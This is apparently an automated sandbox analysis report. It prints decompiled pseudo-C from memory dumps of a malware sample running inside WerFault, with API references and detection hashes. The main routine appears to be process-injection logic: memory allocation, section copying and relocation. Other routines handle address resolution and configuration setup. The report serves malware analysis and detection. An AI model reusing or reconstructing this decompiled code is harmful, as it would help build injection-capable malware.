                        APIs
                        • RegQueryValueExA.KERNELBASE(?,?,00000000,00000001,?,?), ref: 0286285A
                        • RegCloseKey.KERNEL32(?), ref: 02862863
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
• Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseQueryValue
                        • String ID:
                        • API String ID: 3356406503-0
                        • Opcode ID: cfff94d792c7d4e3cbffb31639221d3b25b752c74573ab8774bb3c65b141d115
                        • Instruction ID: aa38999e0c6153e466e57e00a20f8f7eecf235a3a4639068c4102b1ffc4ab88c
                        • Opcode Fuzzy Hash: cfff94d792c7d4e3cbffb31639221d3b25b752c74573ab8774bb3c65b141d115
                        • Instruction Fuzzy Hash: C601C079A00119FBDF11DFA2DD48DEEBBB9EF04704F0080A6B915E61A4D7719A60DB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 76%
                        			E02881AAA(void* __edx, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24) {
                        				intOrPtr _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				signed int _v20;
                        				signed int _v24;
                        				intOrPtr _v28;
                        				signed int _v32;
                        				intOrPtr _v38;
                        				intOrPtr _v42;
                        				intOrPtr _v46;
                        				intOrPtr _v50;
                        				char _v52;
                        				intOrPtr* _v56;
                        				signed int _v62;
                        				signed int _v66;
                        				intOrPtr _v70;
                        				intOrPtr _v74;
                        				intOrPtr _v78;
                        				signed int _v82;
                        				signed int _v86;
                        				signed int _v90;
                        				signed int _v94;
                        				signed int _v98;
                        				char _v100;
                        				signed int _v104;
                        				signed int _v108;
                        				signed int _v112;
                        				signed int _v116;
                        				signed int _v120;
                        				intOrPtr _v124;
                        				intOrPtr _v128;
                        				signed int _v132;
                        				signed int _v136;
                        				char _v660;
                        				signed int _v664;
                        				intOrPtr _v668;
                        				intOrPtr _v672;
                        				signed int _v676;
                        				signed int _v680;
                        				signed int _v688;
                        				signed int _v692;
                        				signed int _v693;
                        				signed int _v694;
                        				signed int _v695;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t255;
                        				void* _t267;
                        				void* _t270;
                        				signed int _t271;
                        				void* _t289;
                        				short _t297;
                        				signed char _t300;
                        				short _t315;
                        				signed char _t327;
                        				signed int _t336;
                        				signed int _t348;
                        				signed int _t363;
                        				signed int _t373;
                        				void* _t381;
                        				signed int _t382;
                        				signed char _t387;
                        				signed int _t389;
                        				signed char _t392;
                        				signed int _t399;
                        				signed int _t405;
                        				signed int _t407;
                        				signed int _t409;
                        				void* _t429;
                        				void* _t432;
                        				void* _t433;
                        
                        				_t429 = __edx;
                        				if(_a4 != 0 || _a12 == 0) {
                        					L4:
                        					__eflags = _a12;
                        					if(_a12 != 0) {
                        						_t407 = _a12;
                        						__eflags =  *_t407;
                        						if( *_t407 != 0) {
                        							goto L7;
                        						} else {
                        							return _t407 | 0xffffffff;
                        						}
                        					}
                        					L7:
                        					_t255 =  *0x289f2e8;
                        					__eflags =  *(_t255 + 0x12e);
                        					if( *(_t255 + 0x12e) != 0) {
                        						_v128 =  *0x289f66c;
                        						_v132 = _v132 & 0x00000000;
                        						_t416 =  *((intOrPtr*)( *0x289f2e8 + 0x122));
                        						_v124 =  *((intOrPtr*)( *0x289f2e8 + 0x1a)) +  *((intOrPtr*)( *0x289f2e8 + 0x122)) + 0x3cc8;
                        						_v112 = 0x478;
                        						_v120 = _v120 & 0x00000000;
                        						_v680 = _v680 & 0x00000000;
                        						_v32 = _v32 & 0x00000000;
                        						_v116 = _v116 & 0x00000000;
                        						_v20 = _v20 & 0x00000000;
                        						__eflags = _a16;
                        						if(_a16 == 0) {
                        							_t405 = _v112 | 0x00000002;
                        							__eflags = _t405;
                        							_v112 = _t405;
                        						}
                        						E02861807( &_v660, 0x208);
                        						E02861807( &_v52, 0x12);
                        						E02861807( &_v100, 0x2a);
                        						__eflags = _a12;
                        						if(_a12 == 0) {
                        							L13:
                        							_v680 = E02863E38(_t416, _a4, _v112);
                        							goto L16;
                        						} else {
                        							__eflags =  *_a12;
                        							if( *_a12 != 0) {
                        								__eflags = _a12;
                        								if(_a12 != 0) {
                        									_v680 =  *_a12;
                        									_a4 =  *0x289f704(_v680);
                        									_v132 = 1;
                        								}
                        								L16:
                        								__eflags = _v680;
                        								if(_v680 == 0) {
                        									L18:
                        									_t267 = 0xfffffffe;
                        									return _t267;
                        								}
                        								__eflags = _a4;
                        								if(_a4 != 0) {
                        									__eflags = _a4 -  *0x289fdb4;
                        									if(_a4 !=  *0x289fdb4) {
                        										_v32 = E02863207(_a4);
                        										__eflags = _v32;
                        										if(__eflags != 0) {
                        											_t270 = E02864C5D(_t416, __eflags, _v680); // executed
                        											__eflags = _t270 - 1;
                        											if(_t270 != 1) {
                        												_t271 = E028644A2(_t416, _v680); // executed
                        												__eflags = _t271;
                        												if(_t271 != 0) {
                        													__eflags = _a16 - 7;
                        													if(_a16 == 7) {
                        														L31:
                        														__eflags = _a16 - 6;
                        														if(_a16 == 6) {
                        															L47:
                        															_v116 = E0286161B(0x2672);
                        															__eflags = _v116;
                        															if(_v116 != 0) {
                        																_v108 = E02880FB5( *((intOrPtr*)( *0x289f2e8 + 0x1e)));
                        																_v136 =  *((intOrPtr*)( *0x289f2e8 + 0x1a));
                        																_v676 = E0288489C -  *((intOrPtr*)( *0x289f2e8 + 0x1e));
                        																_v16 = _v136 + 4;
                        																_v668 = _v16 + 0x2676;
                        																_t419 = _v668;
                        																_v28 = _v668 +  *((intOrPtr*)( *0x289f2e8 + 0x122)) + 4;
                        																_v672 = _v28 + 0xd5a;
                        																_v24 = _v24 & 0x00000000;
                        																__eflags = _v108;
                        																if(_v108 != 0) {
                        																	__eflags = _v676;
                        																	if(_v676 == 0) {
                        																		L53:
                        																		L100:
                        																		E02880F3D( &_v52, _v680);
                        																		__eflags = _v20;
                        																		if(_v20 != 0) {
                        																			VirtualFree(_v20, 0, 0x8000); // executed
                        																		}
                        																		__eflags = _v32;
                        																		if(_v32 != 0) {
                        																			 *0x289f824(_v32);
                        																		}
                        																		__eflags = _v680;
                        																		if(_v680 != 0) {
                        																			__eflags = _v132;
                        																			if(_v132 == 0) {
                        																				 *0x289f824(_v680);
                        																			}
                        																		}
                        																		__eflags = _v116;
                        																		if(_v116 != 0) {
                        																			E028617E4(_v116);
                        																		}
                        																		_t289 = 0xfffffff9;
                        																		return _t289;
                        																	}
                        																	__eflags = _v136;
                        																	if(_v136 != 0) {
                        																		_v20 =  *0x289f6c8(0, _v136, 0x3000, 4);
                        																		__eflags = _v20;
                        																		if(_v20 != 0) {
                        																			_v24 = _v20 + _v676;
                        																			_t297 = 0x12;
                        																			_v52 = _t297;
                        																			_v46 = _v124;
                        																			_t300 = E02880D68(_v680,  &_v52); // executed
                        																			__eflags = _t300 & 0x000000ff;
                        																			if((_t300 & 0x000000ff) != 0) {
                        																				__eflags = _v28 - 6;
                        																				if(_v28 < 6) {
                        																					L62:
                        																					goto L100;
                        																				}
                        																				__eflags = _v16 - 6;
                        																				if(_v16 < 6) {
                        																					goto L62;
                        																				}
                        																				__eflags = _v668 - 6;
                        																				if(_v668 < 6) {
                        																					goto L62;
                        																				}
                        																				__eflags = _v672 - 6;
                        																				if(_v672 >= 6) {
                        																					E02861493(_t419, _v20,  *((intOrPtr*)( *0x289f2e8 + 0x1e)), _v136);
                        																					_push(0x40);
                        																					_t432 = 5;
                        																					_v664 = E028615A2(0x2895380, _t419, _v24, _t432);
                        																					_t123 = _v664 + 6; // 0x6
                        																					_v56 = _v24 + _t123;
                        																					__eflags = _v664;
                        																					if(_v664 >= 0) {
                        																						 *_v56 = _v38 + _v16;
                        																						_t422 = _v108;
                        																						_t411 = _v20;
                        																						_v12 = E02884D95(_v38, _v20,  *((intOrPtr*)( *0x289f2e8 + 0x1e)) -  *((intOrPtr*)(_v108 + 0x34)));
                        																						__eflags = _v12 - 0x100;
                        																						if(_v12 >= 0x100) {
                        																							_t315 = 0x2a;
                        																							_v100 = _t315;
                        																							_v98 = _v98 & 0x00000000;
                        																							_v90 = _a16;
                        																							_v94 = _a4;
                        																							_v62 = _v32;
                        																							_v82 = _v116;
                        																							_v66 = _a8;
                        																							_v86 = _v136;
                        																							_v78 = _v38;
                        																							_v74 = _v38 + _v668;
                        																							_v70 = _v38 + _v28;
                        																							_t327 = E0288058A(_t411, _t422,  &_v100, _v680); // executed
                        																							__eflags = _t327 & 0x000000ff;
                        																							if((_t327 & 0x000000ff) != 0) {
                        																								E02861493(_t422, _v42 + _v16, _v116, 0x2672);
                        																								E02861493(_t422, _v42 + _v28,  *((intOrPtr*)( *0x289f2e8 + 0x12e)), 0xd56);
                        																								_t336 =  *0x289f2e8;
                        																								__eflags =  *(_t336 + 0x11e);
                        																								if( *(_t336 + 0x11e) != 0) {
                        																									_t373 =  *0x289f2e8;
                        																									__eflags =  *(_t373 + 0x122);
                        																									if( *(_t373 + 0x122) != 0) {
                        																										E02889FCE();
                        																										__eflags = _v42 + _v668;
                        																										E02861493(_t422, _v42 + _v668,  *((intOrPtr*)( *0x289f2e8 + 0x11e)),  *((intOrPtr*)( *0x289f2e8 + 0x122)));
                        																										E02889FDA();
                        																									}
                        																								}
                        																								E02861493(_t422, _v42, _v20, _v136);
                        																								_v104 = _v104 & 0x00000000;
                        																								_v8 = _v38 + _v676;
                        																								__eflags = (_a20 & 0x000000ff) - 1;
                        																								if((_a20 & 0x000000ff) != 1) {
                        																									L82:
                        																									__eflags = _a24;
                        																									if(_a24 == 0) {
                        																										L85:
                        																										_v694 = 1;
                        																										L86:
                        																										__eflags = _v694 & 0x000000ff;
                        																										if((_v694 & 0x000000ff) == 0) {
                        																											 *(_a24 + 2) =  *(_a24 + 2) & 0x00000000;
                        																											 *((intOrPtr*)(_a24 + 6)) = _v38;
                        																											 *((intOrPtr*)(_a24 + 0xa)) = _v42;
                        																											 *((intOrPtr*)(_a24 + 0xe)) = _v8;
                        																											 *(_a24 + 0x1a) = _v136;
                        																											 *((intOrPtr*)(_a24 + 0x12)) = _v42 + _v672;
                        																											 *((intOrPtr*)(_a24 + 0x16)) = _v38 + _v672;
                        																											_t363 = _a24;
                        																											_t227 = _t363 + 0x1e;
                        																											 *_t227 =  *(_t363 + 0x1e) & 0x00000000;
                        																											__eflags =  *_t227;
                        																										}
                        																										VirtualFree(_v20, 0, 0x8000); // executed
                        																										__eflags = _v680;
                        																										if(_v680 != 0) {
                        																											__eflags = _v132;
                        																											if(_v132 == 0) {
                        																												 *0x289f824(_v680);
                        																											}
                        																										}
                        																										__eflags = _a8;
                        																										if(_a8 == 0) {
                        																											L94:
                        																											_v695 = 1;
                        																											goto L95;
                        																										} else {
                        																											__eflags = ( *_a8 & 0x0000ffff) - 0xe;
                        																											if(( *_a8 & 0x0000ffff) != 0xe) {
                        																												goto L94;
                        																											}
                        																											_v695 = 0;
                        																											L95:
                        																											__eflags = (_v695 & 0x000000ff) - 1;
                        																											if((_v695 & 0x000000ff) == 1) {
                        																												L98:
                        																												E02880F88( &_v52);
                        																												L99:
                        																												 *0x289f824(_v50);
                        																												E028617E4(_v116); // executed
                        																												return 0;
                        																											}
                        																											__eflags = _a8;
                        																											if(_a8 == 0) {
                        																												goto L99;
                        																											}
                        																											_t348 = _a8;
                        																											__eflags =  *(_t348 + 6) & 0x00000001;
                        																											if(( *(_t348 + 6) & 0x00000001) != 0) {
                        																												goto L99;
                        																											}
                        																											goto L98;
                        																										}
                        																									}
                        																									__eflags = ( *_a24 & 0x0000ffff) - 0x22;
                        																									if(( *_a24 & 0x0000ffff) != 0x22) {
                        																										goto L85;
                        																									}
                        																									_v694 = 0;
                        																									goto L86;
                        																								} else {
                        																									__eflags = _a16;
                        																									if(_a16 != 0) {
                        																										__eflags = _a16 - 4;
                        																										if(_a16 != 4) {
                        																											__eflags = _a16 - 7;
                        																											if(_a16 != 7) {
                        																												L81:
                        																												__eflags = _v38 + _v672;
                        																												E02880778(_v128, _t422, _v680, _v8, _v38 + _v672); // executed
                        																												goto L82;
                        																											}
                        																											__eflags = _a8;
                        																											if(_a8 != 0) {
                        																												__eflags = _v38 + _v672;
                        																												E028808D0( *0x289f600, _t422, _t432, _v680, _v8, _v38 + _v672);
                        																											}
                        																											goto L82;
                        																										}
                        																										goto L81;
                        																									}
                        																									_v104 = E02865D37(_v680, _v8, 0, 0, 0);
                        																									goto L82;
                        																								}
                        																							}
                        																							goto L100;
                        																						}
                        																						goto L100;
                        																					}
                        																					goto L100;
                        																				}
                        																				goto L62;
                        																			}
                        																			goto L100;
                        																		}
                        																		goto L100;
                        																	}
                        																	goto L53;
                        																}
                        																goto L100;
                        															}
                        															goto L100;
                        														}
                        														_t381 = E02864CD0(_v680); // executed
                        														__eflags = _t381 - 1;
                        														if(_t381 == 1) {
                        															_v128 =  *0x289f57c;
                        														}
                        														_t382 = E02864E69( &_v660, _t416, _t433, _v680); // executed
                        														__eflags = _t382;
                        														if(_t382 == 0) {
                        															goto L47;
                        														} else {
                        															_v688 =  *0x289fc64( &_v660);
                        															_v692 = _v692 & 0x00000000;
                        															__eflags = _a8;
                        															if(_a8 == 0) {
                        																L38:
                        																_v693 = 1;
                        																L39:
                        																__eflags = _v693 & 0x000000ff;
                        																if((_v693 & 0x000000ff) == 0) {
                        																	_v692 =  *((intOrPtr*)(_a8 + 0xa));
                        																}
                        																__eflags = _v688;
                        																if(_v688 == 0) {
                        																	goto L47;
                        																} else {
                        																	_t387 = E0287FF99(_t429, _v692,  &_v660);
                        																	__eflags = (_t387 & 0x000000ff) - 1;
                        																	if((_t387 & 0x000000ff) != 1) {
                        																		_t389 =  *0x289f2e8;
                        																		__eflags =  *(_t389 + 0x16) & 0x00000200;
                        																		if(( *(_t389 + 0x16) & 0x00000200) == 0) {
                        																			goto L47;
                        																		}
                        																		_t392 = E0287FD85(_v688);
                        																		__eflags = _t392 & 0x000000ff;
                        																		if((_t392 & 0x000000ff) != 0) {
                        																			goto L47;
                        																		}
                        																		goto L100;
                        																	}
                        																	goto L100;
                        																}
                        															}
                        															__eflags = ( *_a8 & 0x0000ffff) - 0xe;
                        															if(( *_a8 & 0x0000ffff) != 0xe) {
                        																goto L38;
                        															}
                        															_v693 = 0;
                        															goto L39;
                        														}
                        													}
                        													__eflags = _a16 - 6;
                        													if(_a16 == 6) {
                        														goto L31;
                        													}
                        													_t399 = E028644F0(_v680); // executed
                        													__eflags = _t399;
                        													if(_t399 != 0) {
                        														goto L31;
                        													}
                        													goto L100;
                        												}
                        												goto L100;
                        											}
                        											goto L100;
                        										}
                        										goto L100;
                        									}
                        									goto L100;
                        								}
                        								goto L18;
                        							}
                        							goto L13;
                        						}
                        					} else {
                        						return _t255 | 0xffffffff;
                        					}
                        				} else {
                        					_t409 = _a12;
                        					if( *_t409 != 0) {
                        						goto L4;
                        					} else {
                        						return _t409 | 0xffffffff;
                        					}
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e478a4d6b5d9ac9fe1e7a29aeec9e46687aea29756e1cafb82b92c148b26d933
                        • Instruction ID: 1321123b0467752d1a3650f4213be46158728b1dd47db90c65cd50b72755d941
                        • Opcode Fuzzy Hash: e478a4d6b5d9ac9fe1e7a29aeec9e46687aea29756e1cafb82b92c148b26d933
                        • Instruction Fuzzy Hash: 5232163CA00219DFDF24EF98C888BADB7B1BF05319F144496E909EB291D774AA95CF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,000009C4), ref: 0288A575
                        Memory Dump Source
                        • Source File: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: e449adafda609149068734129c4a327589e17ab6fc8386656d9902800a71bf48
                        • Instruction ID: 9cde5dedfdf7952988706096af65f40bd6113f1ab61ef6912f7d14ec27adf2ce
                        • Opcode Fuzzy Hash: e449adafda609149068734129c4a327589e17ab6fc8386656d9902800a71bf48
                        • Instruction Fuzzy Hash: 0B91187DD40204ABDB2CAFA4DC8CBE933B5EB15319F284962E655E36D1C73588A1CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 33%
                        			E0288524A(char* __eax, void* _a4) {
                        				intOrPtr* _v8;
                        				signed int _v12;
                        				char _v16;
                        				intOrPtr _v20;
                        				char _v24;
                        				intOrPtr _v36;
                        				short _v38;
                        				char _v40;
                        				char _v56;
                        				intOrPtr _t46;
                        				void* _t48;
                        				intOrPtr _t49;
                        				intOrPtr _t55;
                        				char _t67;
                        				short _t80;
                        				intOrPtr* _t85;
                        				intOrPtr _t92;
                        				intOrPtr _t93;
                        				intOrPtr _t94;
                        				char* _t95;
                        				intOrPtr _t96;
                        
                        				_t95 = __eax;
                        				 *0x289f880(0);
                        				if(__eax == 0 || _a4 == 0) {
                        					L31:
                        					return 0;
                        				} else {
                        					_t88 = __eax;
                        					if(E028619D6(__eax) == 0) {
                        						goto L31;
                        					}
                        					_t46 =  *0x289fd84(_t95);
                        					_v20 = _t46;
                        					if(_t46 == 0 || _t46 == 0xffffffff) {
                        						_v12 = 0;
                        						_t48 =  *0x289fd7c(_t95, 0, 0,  &_v24); // executed
                        						if(_t48 == 0) {
                        							_t96 = _v24;
                        							_t49 = _t96;
                        							if(_t96 == 0) {
                        								L14:
                        								_v8 = E0286161B(_v12 * 0x11);
                        								_t55 = E0286161B(_v12 << 2);
                        								_t92 = _t55;
                        								_v20 = _t92;
                        								if(_v8 == 0) {
                        									L23:
                        									if(_t92 != 0) {
                        										E028617E4(_t92);
                        									}
                        									 *_a4 = 0;
                        									 *0x289fd80(_t96);
                        									if(_t92 != 0) {
                        										E028617E4(_t92);
                        									}
                        									if(_v8 != 0) {
                        										E028617E4(_v8);
                        									}
                        									_push(0);
                        									L30:
                        									 *0x289f880();
                        									goto L31;
                        								}
                        								if(_t92 == 0) {
                        									E028617E4(_v8);
                        									goto L23;
                        								}
                        								_t93 = _v8;
                        								if(_t96 == 0) {
                        									L21:
                        									 *_a4 = _v12;
                        									 *0x289fd80(_t96);
                        									 *0x289f880(0);
                        									return _v20;
                        								}
                        								_v8 = _t55;
                        								do {
                        									_t67 = 0x20;
                        									_v16 = _t67;
                        									E028614DB(_t88,  &_v56, 0, _t67);
                        									 *0x289fd50( *((intOrPtr*)(_t96 + 0x18)), 0x10, 0,  &_v56,  &_v16);
                        									_t88 =  &_v56;
                        									if(E028619D6( &_v56) > 3) {
                        										 *0x289f6a0(_t93,  &_v56, 0x10);
                        										_v8 = _v8 + 4;
                        										 *_v8 = _t93;
                        										_t96 =  *((intOrPtr*)(_t96 + 0x1c));
                        										_t93 = _t93 + _v16 + 1;
                        									}
                        								} while (_t96 != 0);
                        								goto L21;
                        							} else {
                        								goto L13;
                        							}
                        							do {
                        								L13:
                        								_t49 =  *((intOrPtr*)(_t49 + 0x1c));
                        								_v12 = _v12 + 1;
                        							} while (_t49 != 0);
                        							goto L14;
                        						}
                        						_push(_t48);
                        						goto L30;
                        					} else {
                        						_t94 = E0286161B(0x104);
                        						if(_t94 == 0) {
                        							goto L31;
                        						}
                        						E028614DB(_t88, _t94, 0, 0x104);
                        						_t80 = 2;
                        						_push(8);
                        						_push(0);
                        						_v40 = _t80;
                        						_push(0);
                        						_push(0x103);
                        						_v36 = _v20;
                        						_push(_t94);
                        						_v38 = 0;
                        						_push(0x10);
                        						_push( &_v40);
                        						if( *0x289fd68() != 0) {
                        							goto L31;
                        						}
                        						_t85 = E0286161B(4);
                        						if(_t85 != 0) {
                        							 *_t85 = _t94;
                        							 *_a4 = 1;
                        							return _t85;
                        						}
                        						E028617E4(_t94);
                        						goto L31;
                        					}
                        				}
                        			}
                        0x02885256
                        0x02885258
                        0x02885260
                        0x02885417
                        0x00000000
                        0x0288526f
                        0x0288526f
                        0x02885278
                        0x00000000
                        0x00000000
                        0x0288527f
                        0x02885285
                        0x0288528a
                        0x0288530c
                        0x0288530f
                        0x02885317
                        0x0288531f
                        0x02885322
                        0x02885326
                        0x02885332
                        0x02885340
                        0x02885349
                        0x0288534e
                        0x02885350
                        0x02885356
                        0x028853e3
                        0x028853e5
                        0x028853e8
                        0x028853e8
                        0x028853f1
                        0x028853f3
                        0x028853fb
                        0x028853fe
                        0x028853fe
                        0x02885406
                        0x0288540b
                        0x0288540b
                        0x02885410
                        0x02885411
                        0x02885411
                        0x00000000
                        0x02885411
                        0x0288535e
                        0x028853de
                        0x00000000
                        0x028853de
                        0x02885360
                        0x02885365
                        0x028853c0
                        0x028853c7
                        0x028853c9
                        0x028853d0
                        0x00000000
                        0x028853d6
                        0x02885367
                        0x0288536a
                        0x0288536c
                        0x0288536e
                        0x02885376
                        0x02885389
                        0x0288538f
                        0x0288539a
                        0x028853a3
                        0x028853ac
                        0x028853b0
                        0x028853b5
                        0x028853b8
                        0x028853b8
                        0x028853bc
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02885328
                        0x02885328
                        0x02885328
                        0x0288532b
                        0x0288532e
                        0x00000000
                        0x02885328
                        0x02885319
                        0x00000000
                        0x02885291
                        0x0288529c
                        0x028852a0
                        0x00000000
                        0x00000000
                        0x028852a9
                        0x028852b0
                        0x028852b1
                        0x028852b3
                        0x028852b4
                        0x028852bb
                        0x028852bc
                        0x028852c1
                        0x028852c6
                        0x028852c7
                        0x028852cb
                        0x028852d0
                        0x028852d9
                        0x00000000
                        0x00000000
                        0x028852e1
                        0x028852e8
                        0x028852f8
                        0x028852fa
                        0x00000000
                        0x028852fa
                        0x028852eb
                        0x00000000
                        0x028852eb
                        0x0288528a

                        APIs
                        • getaddrinfo.WS2_32(?,00000000,00000000,00000000,?,?,?,?,00000000), ref: 0288530F
                          • Part of subcall function 028617E4: RtlFreeHeap.NTDLL(00000000,00000000,00000000,?,0286175C,00000000,00000000,00000000,00000002,kernel32.dll,?,?,02866361), ref: 028617FD
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeHeapgetaddrinfo
                        • String ID:
                        • API String ID: 2189223984-0
                        • Opcode ID: 293a2c9cec6d15f9c7a00894b23c78b7751d19513c8c8b91ef4d8b65316654bf
                        • Instruction ID: 5ff19b8e5ec2d53fe2b9ca5dc287a6f4892ad061f480a13d4de75270122b0110
                        • Opcode Fuzzy Hash: 293a2c9cec6d15f9c7a00894b23c78b7751d19513c8c8b91ef4d8b65316654bf
                        • Instruction Fuzzy Hash: 5C514FBD900209AFCB10EFE8C8889BEB7B9BF45309B594866E605F7241D7749E418B61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 34%
                        			E0286E6A4(intOrPtr _a4) {
                        				char _v524;
                        				signed int _v528;
                        				char _v1052;
                        				void* __edi;
                        
                        				 *0x289f2e8 = E0286161B(0x2672);
                        				if( *0x289f2e8 == 0) {
                        					return 0;
                        				}
                        				_v528 = _v528 & 0x00000000;
                        				 *((short*)( *0x289f2e8)) = 0x2672;
                        				 *((short*)( *0x289f2e8 + 2)) = 0xf1f1;
                        				E02861807( &_v524, 0x208);
                        				E02861807( &_v1052, 0x208);
                        				E028651F6( *0x289f2e8,  &_v524, 0x103);
                        				 *0x289f7b8( &_v524,  &_v1052, 0x143); // executed
                        				_t76 =  &_v1052;
                        				if(E028619E8( &_v1052) < 6) {
                        					 *0x289f6a4( &_v1052,  &_v524, 0x143);
                        				}
                        				if(_a4 != 0) {
                        					E02861493(_t76,  *0x289f2e8, _a4, 0x2672);
                        				} else {
                        					 *0x289f6a4( *0x289f2e8 + 0x1646,  &_v1052, 0x143);
                        					 *0x289f6a4( *0x289f2e8 + 0x1b56,  *0x289f2e8 + 0x1646, 0x103);
                        					 *0x289fc84( *0x289f2e8 + 0x1b56);
                        					 *0x289fc78( *0x289f2e8 + 0x1b56);
                        					E0286E5F5();
                        				}
                        				_v528 =  *0x289fc64( *0x289f2e8 + 0x1646);
                        				if(_v528 != 0) {
                        					 *0x289f6a4( *0x289f2e8 + 0x2376, _v528, 0x3f);
                        				}
                        				 *0x289f6a4( *0x289f2e8 + 0x13be,  &_v1052, 0x143);
                        				 *((intOrPtr*)( *0x289f2e8 + 0x156)) = 0x289898e;
                        				 *((intOrPtr*)( *0x289f2e8 + 0x15a)) = E02861657(0xd56, _t76, 0x289098c, 0xd56);
                        				E02861807( *0x289f2e8 + 0x106, 0x18);
                        				 *0x289f8b0( *0x289f2e8 + 0x106, 0xfa0);
                        				return 1;
                        			}
                        0x0286e6b8
                        0x0286e6c4
                        0x00000000
                        0x0286e893
                        0x0286e6ca
                        0x0286e6dc
                        0x0286e6ea
                        0x0286e6fa
                        0x0286e70b
                        0x0286e71b
                        0x0286e733
                        0x0286e739
                        0x0286e747
                        0x0286e75c
                        0x0286e75c
                        0x0286e766
                        0x0286e7dd
                        0x0286e768
                        0x0286e77f
                        0x0286e7a0
                        0x0286e7b1
                        0x0286e7c2
                        0x0286e7c8
                        0x0286e7c8
                        0x0286e7f3
                        0x0286e800
                        0x0286e815
                        0x0286e815
                        0x0286e832
                        0x0286e83d
                        0x0286e861
                        0x0286e874
                        0x0286e889
                        0x00000000

                        APIs
                        • GetLongPathNameW.KERNEL32(?,?,00000143,00000103,?,00000208,?,00000208,00002672,028A0044), ref: 0286E733
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: LongNamePath
                        • String ID:
                        • API String ID: 82841172-0
                        • Opcode ID: 53fd6e3026a8e097314bd7956b7b445010c46c182c38ac5c00493740f5a291b4
                        • Instruction ID: 83bb5450d94e217c3cf95a67524e16f56d166d42389d4dfd51214095221adfc0
                        • Opcode Fuzzy Hash: 53fd6e3026a8e097314bd7956b7b445010c46c182c38ac5c00493740f5a291b4
                        • Instruction Fuzzy Hash: 7541907DD802089BDB14DFA8EC4DFD633B9AB14309F184961A748E76E1CB3485A0CF58
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 25%
                        			E02865446(void* __ecx) {
                        				char _v6;
                        				signed short _v12;
                        				intOrPtr _v152;
                        				intOrPtr _v156;
                        				char _v160;
                        				short _v196;
                        				signed int _t33;
                        				void* _t37;
                        				void* _t40;
                        				signed int _t42;
                        
                        				E028614DB(__ecx,  &_v160, 0, 0x9c);
                        				E028614DB(__ecx,  &_v196, 0, 0x24);
                        				_v160 = 0x9c;
                        				 *0x289f800( &_v196); // executed
                        				 *0x289f80c( &_v160);
                        				_t33 = 2;
                        				if(_v6 == _t33 || _v6 == 3) {
                        					if(_v156 != 5) {
                        						if(_v156 != 6) {
                        							goto L23;
                        						}
                        						if(_v152 == 0) {
                        							goto L25;
                        						}
                        						if(_v152 != 1) {
                        							if(_v152 != _t33) {
                        								goto L23;
                        							}
                        							_t33 = 0x2000;
                        							goto L25;
                        						}
                        						_push(4);
                        						goto L24;
                        					}
                        					if(_v152 != _t33) {
                        						goto L23;
                        					}
                        					_t33 = 1;
                        					goto L25;
                        				} else {
                        					if(_v6 != 1) {
                        						L23:
                        						_push(8);
                        						L24:
                        						_pop(_t33);
                        						L25:
                        						if(_v196 == 9) {
                        							L27:
                        							_t42 = 0x200;
                        							L28:
                        							_t37 = (_v12 & 0x0000ffff) - 1;
                        							if(_t37 == 0) {
                        								_t42 = _t42 | 0x00000400;
                        							} else {
                        								_t40 = _t37 - 1;
                        								if(_t40 == 0) {
                        									_t42 = _t42 | 0x00000800;
                        								} else {
                        									if(_t40 == 1) {
                        										_t42 = _t42 | 0x00001000;
                        									}
                        								}
                        							}
                        							 *0x289fdc8 = _t33 | _t42;
                        							return _t33;
                        						}
                        						_t42 = 0x100;
